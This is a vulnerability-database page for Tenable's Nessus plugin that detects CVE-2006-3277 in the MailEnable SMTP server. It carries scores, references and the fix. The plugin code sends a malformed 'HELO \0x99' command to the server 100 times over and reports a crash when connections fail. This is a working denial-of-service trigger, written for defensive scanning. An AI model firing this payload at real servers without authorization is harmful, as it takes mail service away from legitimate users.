Lucene search

K
nessusThis script is Copyright (C) 2006-2018 Tenable Network Security, Inc.MAILENABLE_SMTP_HELO_DOS.NASL
HistoryJun 28, 2006 - 12:00 a.m.

MailEnable SMTP Server HELO Command Remote DoS

2006-06-2800:00:00
This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
www.tenable.com
12

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

0.114 Low

EPSS

Percentile

95.2%

The remote host is running MailEnable, a commercial mail server for Windows.

According to the version number in its banner, the SMTP server bundled with the installation of MailEnable on the remote host will crash when handling malformed HELO commands. An unauthenticated attacker may be able to leverage this issue to deny service to legitimate users.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(21771);
  script_version("1.19");
  script_cvs_date("Date: 2018/11/15 20:50:24");

  script_cve_id("CVE-2006-3277");
  script_bugtraq_id(18630);

  script_name(english:"MailEnable SMTP Server HELO Command Remote DoS");
  script_summary(english:"Tries to crash MailEnable SMTP server");

  script_set_attribute(attribute:"synopsis", value:"The remote SMTP server is susceptible to a denial of service attack.");
  script_set_attribute(attribute:"description", value:
"The remote host is running MailEnable, a commercial mail server for
Windows.

According to the version number in its banner, the SMTP server bundled
with the installation of MailEnable on the remote host will crash when
handling malformed HELO commands. An unauthenticated attacker may be
able to leverage this issue to deny service to legitimate users.");
  script_set_attribute(attribute:"see_also", value:"http://www.divisionbyzero.be/?p=173");
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/438374/30/0/threaded");
  script_set_attribute(attribute:"see_also", value:"http://www.divisionbyzero.be/?p=174");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2006/Jun/810");
  script_set_attribute(attribute:"see_also", value:"http://www.mailenable.com/hotfix/");
  script_set_attribute(attribute:"solution", value:"Apply the ME-10013 hotfix.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/06/24");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/06/28");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:mailenable:mailenable");
  script_end_attributes();

  script_category(ACT_DENIAL);
  script_family(english:"SMTP problems");
  script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");

  script_dependencie("smtpserver_detect.nasl");
  script_require_keys("Settings/ParanoidReport");
  script_require_ports("Services/smtp", 25);

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("smtp_func.inc");


if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_service(svc:"smtp", default:25, exit_on_fail: 1);
if (get_kb_item('SMTP/'+port+'/broken')) exit(0);


# Make sure the banner corresponds to MailEnable.
banner = get_smtp_banner(port:port);
if (
  !banner ||
  !egrep(pattern:"Mail(Enable| Enable SMTP) Service", string:banner)
) exit(0);


# Try to crash the daemon.
c = 'HELO \0x99\r\n';

failed = 0;
tries = 100;
for (iter=1; iter <= tries; iter++)
{
  # Try to crash the daemon.
  soc = open_sock_tcp(port);
  if (soc)
  {
    failed = 0;
    send(socket:soc, data:c);
    close(soc);
  }
  else
  {
    sleep(1);

    # Call it a problem if we see three consecutive failures to connect.
    if (++failed > 2)
    {
        security_warning(port);
        exit(0);
    }
  }
}
VendorProductVersionCPE
mailenablemailenablecpe:/a:mailenable:mailenable

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

0.114 Low

EPSS

Percentile

95.2%

Related for MAILENABLE_SMTP_HELO_DOS.NASL